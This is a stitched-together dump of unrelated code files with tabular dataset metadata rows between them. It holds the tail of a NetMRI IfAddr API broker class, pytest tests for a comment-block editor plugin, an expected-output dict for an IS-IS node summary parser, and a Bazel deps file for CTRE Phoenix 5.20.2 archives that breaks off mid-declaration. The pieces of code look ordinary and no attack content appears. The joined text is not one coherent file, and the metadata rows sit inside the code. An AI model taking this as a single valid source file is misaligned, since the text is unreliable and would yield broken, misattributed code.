:param methods: A list of if addr methods. The listed methods will be called on each if addr returned and included in the output. Available methods are: vrf_name, vrf_description, vrf_rd, network_id, cap_if_net_provisioning_ipv4_ind, cap_if_net_provisioning_ipv6_ind, cap_if_net_deprovisioning_ipv4_ind, cap_if_net_deprovisioning_ipv6_ind, meta, data_source, device, interface.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: meta, data_source, device, interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` IfAddrID
:param sort: The data field(s) to use for sorting the output. Default is IfAddrID. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each IfAddr. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return if_addrs: An array of the IfAddr objects that match the specified input criteria.
:rtype if_addrs: Array of IfAddr
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def data_source(self, **kwargs):
"""The NetMRI device that collected this record.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The NetMRI device that collected this record.
:rtype : DataSource
"""
return self.api_request(self._get_method_fullname("data_source"), kwargs)
def interface(self, **kwargs):
"""The interface configured with this address.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The interface configured with this address.
:rtype : Interface
"""
return self.api_request(self._get_method_fullname("interface"), kwargs)
def infradevice(self, **kwargs):
"""The device containing the interface configured with this address.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device containing the interface configured with this address.
:rtype : InfraDevice
"""
return self.api_request(self._get_method_fullname("infradevice"), kwargs)
def network_id(self, **kwargs):
"""The Network View ID assigned to the interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The Network View ID assigned to the interface.
:rtype : Integer
"""
return self.api_request(self._get_method_fullname("network_id"), kwargs)
def vrf_name(self, **kwargs):
"""The VRF name assigned to the interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The VRF name assigned to the interface.
:rtype : String
"""
return self.api_request(self._get_method_fullname("vrf_name"), kwargs)
def vrf_description(self, **kwargs):
"""The VRF description of the vrf assigned to the interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The VRF description of the vrf assigned to the interface.
:rtype : String
"""
return self.api_request(self._get_method_fullname("vrf_description"), kwargs)
def vrf_rd(self, **kwargs):
"""The VRF route distinguisher of the vrf assigned to the interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The VRF route distinguisher of the vrf assigned to the interface.
:rtype : String
"""
return self.api_request(self._get_method_fullname("vrf_rd"), kwargs)
def cap_if_net_provisioning_ipv4_ind(self, **kwargs):
"""Capability to provision an ipv4 network on this interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability to provision an ipv4 network on this interface.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_if_net_provisioning_ipv4_ind"), kwargs)
def cap_if_net_provisioning_ipv6_ind(self, **kwargs):
"""Capability to provision an ipv6 network on this interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability to provision an ipv6 network on this interface.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_if_net_provisioning_ipv6_ind"), kwargs)
def cap_if_net_deprovisioning_ipv4_ind(self, **kwargs):
"""Capability of de-provisioning an ipv4 network from this interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of de-provisioning an ipv4 network from this interface.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_if_net_deprovisioning_ipv4_ind"), kwargs)
def cap_if_net_deprovisioning_ipv6_ind(self, **kwargs):
"""Capability of de-provisioning an ipv6 network from this interface.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : Capability of de-provisioning an ipv6 network from this interface.
:rtype : Boolean
"""
return self.api_request(self._get_method_fullname("cap_if_net_deprovisioning_ipv6_ind"), kwargs)
def device(self, **kwargs):
"""The device containing the interface configured with this address.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return : The device containing the interface configured with this address.
:rtype : Device
"""
return self.api_request(self._get_method_fullname("device"), kwargs)
| 52.15614 | 633 | 0.613811 | 11,072 | 89,187 | 4.84655 | 0.029624 | 0.071188 | 0.046272 | 0.053223 | 0.962617 | 0.961853 | 0.942957 | 0.928123 | 0.915768 | 0.913494 | 0 | 0.005374 | 0.303183 | 89,187 | 1,709 | 634 | 52.186659 | 0.858078 | 0.812484 | 0 | 0 | 0 | 0 | 0.102935 | 0.057819 | 0 | 0 | 0 | 0 | 0 | 1 | 0.457143 | false | 0 | 0.028571 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
589f0c205d4607f4990351a29b6338cc7ecb355c | 2,810 | py | Python | tests/test_comment_block_plugin.py | Akuli/editor | cf98c538e75a07d825f9066e25a3752fdf7c3c29 | [
"MIT"
] | 65 | 2017-05-23T00:23:07.000Z | 2022-03-17T21:07:12.000Z | tests/test_comment_block_plugin.py | Akuli/editor | cf98c538e75a07d825f9066e25a3752fdf7c3c29 | [
"MIT"
] | 689 | 2017-03-17T15:42:04.000Z | 2022-03-29T19:43:40.000Z | tests/test_comment_block_plugin.py | Akuli/editor | cf98c538e75a07d825f9066e25a3752fdf7c3c29 | [
"MIT"
] | 28 | 2017-03-13T19:41:34.000Z | 2022-01-29T00:47:29.000Z | def test_comment_block_and_undo(filetab):
filetab.textwidget.insert("1.0", "foo\nbar\nbaz")
filetab.textwidget.tag_add("sel", "1.0", "end - 1 char")
filetab.textwidget.event_generate("<numbersign>") # hashtag key press
filetab.textwidget.insert("end - 1 char", "lol")
assert filetab.textwidget.get("1.0", "end - 1 char") == "#foo\n#bar\n#bazlol"
filetab.textwidget.edit_undo()
assert filetab.textwidget.get("1.0", "end - 1 char") == "#foo\n#bar\n#baz"
filetab.textwidget.edit_undo()
assert filetab.textwidget.get("1.0", "end - 1 char") == "foo\nbar\nbaz"
filetab.textwidget.edit_undo()
assert filetab.textwidget.get("1.0", "end - 1 char") == ""
def test_partially_commented(filetab):
filetab.textwidget.insert(
"1.0",
"""\
We select starting from this line
# This comment is not touched at all because it appears to be hand-written
#
To start of this line, so that the plugin shouldn't see this line as selected
""",
)
filetab.textwidget.tag_add("sel", "1.0", "4.0")
filetab.textwidget.event_generate("<numbersign>")
assert (
filetab.textwidget.get("1.0", "end - 1 char")
== """\
#We select starting from this line
## This comment is not touched at all because it appears to be hand-written
#
To start of this line, so that the plugin shouldn't see this line as selected
"""
)
filetab.textwidget.event_generate("<numbersign>")
assert (
filetab.textwidget.get("1.0", "end - 1 char")
== """\
We select starting from this line
# This comment is not touched at all because it appears to be hand-written
To start of this line, so that the plugin shouldn't see this line as selected
"""
)
def test_cant_uncomment_bug(filetab):
filetab.textwidget.insert(
"1.0",
"""\
def __init__(self, f):
self._i_opened_the_file = None
try:
self.initfp(f)
except:
if self._i_opened_the_file:
f.close()
raise
""",
)
filetab.textwidget.tag_add("sel", "3.8", "3.8 + 5 lines")
filetab.textwidget.event_generate("<numbersign>")
assert (
filetab.textwidget.get("1.0", "end - 1 char")
== """\
def __init__(self, f):
self._i_opened_the_file = None
# try:
# self.initfp(f)
# except:
# if self._i_opened_the_file:
# f.close()
# raise
"""
)
filetab.textwidget.event_generate("<numbersign>")
assert (
filetab.textwidget.get("1.0", "end - 1 char")
== """\
def __init__(self, f):
self._i_opened_the_file = None
try:
self.initfp(f)
except:
if self._i_opened_the_file:
f.close()
raise
"""
)
| 29.270833 | 81 | 0.6 | 378 | 2,810 | 4.312169 | 0.224868 | 0.239877 | 0.04908 | 0.033129 | 0.913497 | 0.866871 | 0.807975 | 0.784049 | 0.784049 | 0.784049 | 0 | 0.020723 | 0.261566 | 2,810 | 95 | 82 | 29.578947 | 0.764819 | 0.00605 | 0 | 0.478873 | 1 | 0 | 0.468908 | 0.039496 | 0 | 0 | 0 | 0 | 0.112676 | 1 | 0.042254 | false | 0 | 0 | 0 | 0.042254 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
543fd2bc4208e6faa5f1f55e190015d773ca80ca | 396 | py | Python | src/genie/libs/parser/iosxe/tests/ShowIsisNodeSummary/cli/equal/golden_output_expected.py | nielsvanhooy/genieparser | 9a1955749697a6777ca614f0af4d5f3a2c254ccd | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowIsisNodeSummary/cli/equal/golden_output_expected.py | nielsvanhooy/genieparser | 9a1955749697a6777ca614f0af4d5f3a2c254ccd | [
"Apache-2.0"
] | null | null | null | src/genie/libs/parser/iosxe/tests/ShowIsisNodeSummary/cli/equal/golden_output_expected.py | nielsvanhooy/genieparser | 9a1955749697a6777ca614f0af4d5f3a2c254ccd | [
"Apache-2.0"
] | null | null | null | expected_output={
'tag': {
'nSVL-1': {
'level': {
'1': {
'switch': [
'sw.F87A4137BE0.00',
'sw.F87A4137BE0.01',
'sw.40B5C1FFEE0.00'
]
},
'2': {
'switch': [
'sw.F87A4137BE0.00',
'sw.F87A4137BE0.01',
'sw.40B5C1FFEE0.00'
]
}
}
}
}
} | 18 | 32 | 0.333333 | 28 | 396 | 4.678571 | 0.464286 | 0.396947 | 0.290076 | 0.320611 | 0.778626 | 0.778626 | 0.778626 | 0.778626 | 0.778626 | 0.778626 | 0 | 0.265 | 0.494949 | 396 | 22 | 33 | 18 | 0.39 | 0 | 0 | 0.363636 | 0 | 0 | 0.327456 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
54b2b1337073fc7419de2553dbf9c9e405285ae4 | 14,960 | bzl | Python | bazelrio/dependencies/phoenix/5_20_2/deps.bzl | noamzaks/bazelrio | 1684b66865e655fc0f3832f0e3602e905a1d4035 | [
"MIT"
] | 5 | 2021-09-26T01:16:26.000Z | 2022-03-18T17:21:23.000Z | bazelrio/dependencies/phoenix/5_20_2/deps.bzl | noamzaks/bazelrio | 1684b66865e655fc0f3832f0e3602e905a1d4035 | [
"MIT"
] | 59 | 2021-09-23T04:19:33.000Z | 2022-03-29T07:47:10.000Z | bazelrio/dependencies/phoenix/5_20_2/deps.bzl | noamzaks/bazelrio | 1684b66865e655fc0f3832f0e3602e905a1d4035 | [
"MIT"
] | 2 | 2021-11-18T10:34:16.000Z | 2021-11-21T06:15:07.000Z | load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
load("@bazel_tools//tools/build_defs/repo:jvm.bzl", "jvm_maven_import_external")
load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe")
load("@bazelrio//:deps_utils.bzl", "cc_library_headers", "cc_library_shared")
def setup_phoenix_5_20_2_dependencies():
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_api-cpp_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/api-cpp/5.20.2/api-cpp-5.20.2-headers.zip",
sha256 = "a5c192134fe3bfa1a1d46518ee8fff861bc9f8dc34a2cb541a8bbd5d8ddbf818",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_api-cpp-sim_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/api-cpp-sim/5.20.2/api-cpp-sim-5.20.2-headers.zip",
sha256 = "a5c192134fe3bfa1a1d46518ee8fff861bc9f8dc34a2cb541a8bbd5d8ddbf818",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_cci_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/cci/5.20.2/cci-5.20.2-headers.zip",
sha256 = "1363afa72180fa59ee34d3ec9e4ccb98458fdf1f2b8b894b41547747466e86bc",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_cci-sim_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/cci-sim/5.20.2/cci-sim-5.20.2-headers.zip",
sha256 = "1363afa72180fa59ee34d3ec9e4ccb98458fdf1f2b8b894b41547747466e86bc",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simcancoder_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simCANCoder/5.20.2/simCANCoder-5.20.2-headers.zip",
sha256 = "f39ea63bb09ba8736dacf8a2f5fd4591912b466b8054dd88d3cbe01a1f943e57",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simpigeonimu_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simPigeonIMU/5.20.2/simPigeonIMU-5.20.2-headers.zip",
sha256 = "f39ea63bb09ba8736dacf8a2f5fd4591912b466b8054dd88d3cbe01a1f943e57",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonfx_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonFX/5.20.2/simTalonFX-5.20.2-headers.zip",
sha256 = "f39ea63bb09ba8736dacf8a2f5fd4591912b466b8054dd88d3cbe01a1f943e57",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonsrx_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonSRX/5.20.2/simTalonSRX-5.20.2-headers.zip",
sha256 = "f39ea63bb09ba8736dacf8a2f5fd4591912b466b8054dd88d3cbe01a1f943e57",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simvictorspx_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simVictorSPX/5.20.2/simVictorSPX-5.20.2-headers.zip",
sha256 = "f39ea63bb09ba8736dacf8a2f5fd4591912b466b8054dd88d3cbe01a1f943e57",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_wpiapi-cpp_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/wpiapi-cpp/5.20.2/wpiapi-cpp-5.20.2-headers.zip",
sha256 = "ea0f94efa884896a7fe6071e22d1a5fd87076b4e8a838bac5493dbb1b5b3baf6",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_wpiapi-cpp-sim_headers",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/wpiapi-cpp-sim/5.20.2/wpiapi-cpp-sim-5.20.2-headers.zip",
sha256 = "ea0f94efa884896a7fe6071e22d1a5fd87076b4e8a838bac5493dbb1b5b3baf6",
build_file_content = cc_library_headers,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_api-cpp_linuxathena",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/api-cpp/5.20.2/api-cpp-5.20.2-linuxathena.zip",
sha256 = "e77de35f12871595cfece1316d9a8e0f168590f38b0162c0419289784d4ea283",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_api-cpp-sim_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/api-cpp-sim/5.20.2/api-cpp-sim-5.20.2-windowsx86-64.zip",
sha256 = "30e0a6c44f5e79785750bbdc12a3c2fcbca01f03ee360350930c04b154176504",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_api-cpp-sim_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/api-cpp-sim/5.20.2/api-cpp-sim-5.20.2-linuxx86-64.zip",
sha256 = "6a95f11d9a0763d72cffe47429f7b7fce4463759581cd8b2ce8ba56f50206dce",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_api-cpp-sim_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/api-cpp-sim/5.20.2/api-cpp-sim-5.20.2-osxx86-64.zip",
sha256 = "aa4f6b923d82a1585d9df84996fd725481b985b436ef8f45e54c3c522e2c14a2",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_cci_linuxathena",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/cci/5.20.2/cci-5.20.2-linuxathena.zip",
sha256 = "c056bb3856003f7bcceef8082907852a6d6ecc76cee9d6d615020b7f07795e72",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_cci-sim_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/cci-sim/5.20.2/cci-sim-5.20.2-windowsx86-64.zip",
sha256 = "c370dc11c328bf006c44771bc0b78027af296ed3a9b826fc9664b88ef5aabfd9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_cci-sim_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/cci-sim/5.20.2/cci-sim-5.20.2-linuxx86-64.zip",
sha256 = "80cf04aecf8ab12335e5c7281b572a52db16fd7b8ff04651ae655815fcc112f5",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_cci-sim_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/cci-sim/5.20.2/cci-sim-5.20.2-osxx86-64.zip",
sha256 = "e0eec6bb14e99936fbd05b285c34dffb4675ed32e019e3d578b4b469b931c8b5",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simcancoder_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simCANCoder/5.20.2/simCANCoder-5.20.2-windowsx86-64.zip",
sha256 = "fcc8f8aeb3748d8037909ce81c0b4550d11e02f72dc89c14884a8b0266b17514",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simcancoder_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simCANCoder/5.20.2/simCANCoder-5.20.2-linuxx86-64.zip",
sha256 = "8498bfeef19037e528646e207b593c79d68d79fb9881ac1873262dcc38b1285b",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simcancoder_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simCANCoder/5.20.2/simCANCoder-5.20.2-osxx86-64.zip",
sha256 = "b47da2d29a03a801876299777ca6913206930076104f66000e9a4f5f6e3cf4bf",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simpigeonimu_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simPigeonIMU/5.20.2/simPigeonIMU-5.20.2-windowsx86-64.zip",
sha256 = "a4cabfafa914af7f1c2e0f35bec07e0a70644bc69739a476d090f88dc093bebe",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simpigeonimu_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simPigeonIMU/5.20.2/simPigeonIMU-5.20.2-linuxx86-64.zip",
sha256 = "a450c52ac436d4dddfcaa0f58f88ae8acf854bd995bc9a27c8877706b1346421",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simpigeonimu_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simPigeonIMU/5.20.2/simPigeonIMU-5.20.2-osxx86-64.zip",
sha256 = "935e1e6df926ea7f8e0b87e35505371a1194240d05d7c305630375b93ebfddad",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonfx_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonFX/5.20.2/simTalonFX-5.20.2-windowsx86-64.zip",
sha256 = "e6263df262ff5e450d473d07c2ba44aede7b0bfc1187d28023097e9f1f2dc3bc",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonfx_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonFX/5.20.2/simTalonFX-5.20.2-linuxx86-64.zip",
sha256 = "56c45b9d6511748f34017f90608e81d19209ce78a1e943683bcf7d6f2ec0ea35",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonfx_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonFX/5.20.2/simTalonFX-5.20.2-osxx86-64.zip",
sha256 = "0e3f33535f34c1977fef882351bed9e60279e67be8685c52a07601aa0035c318",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonsrx_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonSRX/5.20.2/simTalonSRX-5.20.2-windowsx86-64.zip",
sha256 = "80f8684b410ddaf18d1078ca909a2e4f121b7fa32d7cffd366ea0d0600f0640e",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonsrx_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonSRX/5.20.2/simTalonSRX-5.20.2-linuxx86-64.zip",
sha256 = "b595daa77385e4ea411ae9969b4fb3e464a0233704589c747a77db018c331a56",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simtalonsrx_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simTalonSRX/5.20.2/simTalonSRX-5.20.2-osxx86-64.zip",
sha256 = "fcd9ce46485cee96669b5c13e2f7bf4815647436055c43eba3620894aebcda30",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simvictorspx_windowsx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simVictorSPX/5.20.2/simVictorSPX-5.20.2-windowsx86-64.zip",
sha256 = "3d502c3cab301d0bfd12fc30ef4588514c33d755a1841001cf182634c5af7060",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simvictorspx_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simVictorSPX/5.20.2/simVictorSPX-5.20.2-linuxx86-64.zip",
sha256 = "f7305f8480eacf4d429532263a7232a6bee44fb12f1c2eee203fdf46f852b20d",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_simvictorspx_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/simVictorSPX/5.20.2/simVictorSPX-5.20.2-osxx86-64.zip",
sha256 = "2b8f328f7558a12dd7c2dfa47b9a229e970969d018a4ae6fa24f65f702f43ba9",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_wpiapi-cpp_linuxathena",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/wpiapi-cpp/5.20.2/wpiapi-cpp-5.20.2-linuxathena.zip",
sha256 = "0ce2dc5dbb69a623e942c43204a2ca9472083ff8c7cb35ca2369a2630fda9c3a",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_wpiapi-cpp-sim_windowsx86-64",
